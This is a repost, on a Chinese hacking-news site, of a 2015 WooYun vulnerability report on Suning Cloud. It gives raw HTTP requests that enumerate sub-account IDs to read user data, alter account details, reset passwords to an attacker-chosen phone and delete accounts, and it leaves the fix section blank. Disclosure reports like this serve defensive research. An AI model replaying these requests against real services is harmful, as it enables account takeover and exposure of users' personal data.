记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

苏宁易购某站用户信息泄露及密码重置

2015-08-17 11:20

code 区域
http://www.suningcloud.com/

苏宁云



1`登陆 苏宁易购帐号-创建帐号-察看



code 区域
http://www.suningcloud.com/account/getSubCustInfo.htm?subCustId=1XXX



遍历 subCusId 即可



id=2

s2.png

<

id=1

s.png





2`任意账号信息修改

code 区域
POST /account/authoritySubCust.htm HTTP/1.1

Host: www.suningcloud.com





subCustId=XXXX&userName=fei&email=1212%40qq.com&mobile=13333333333&male=&department=zongbu&phone=88888888&nickName=wy888&addRscIds=&delRscIds=





now1.png





也可以遍历直接修改











漏洞证明:

3`任意用户密码重置 -修改用户手机号码为可控 ,发送6位数字密码到指定那个手机号码



code 区域
POST /account/resetSubCustPwd.htm HTTP/1.1

Host: www.suningcloud.com



subCustId=1





4D5C659004DCCDB2CCF4980856EF47EF.png





登陆



id1.png





登陆之后可再次修改密码



修改米mia.png





成功!

密码重之.png







4`任意用户账户删除

code 区域
POST /account/deleteSubCustById.htm HTTP/1.1

Host: www.suningcloud.com



subCustId=1XX





del.png

修复方案:

~~

知识来源: www.wooyun.org/bugs/wooyun-2015-0124200

阅读:105854 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“苏宁易购某站用户信息泄露及密码重置”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云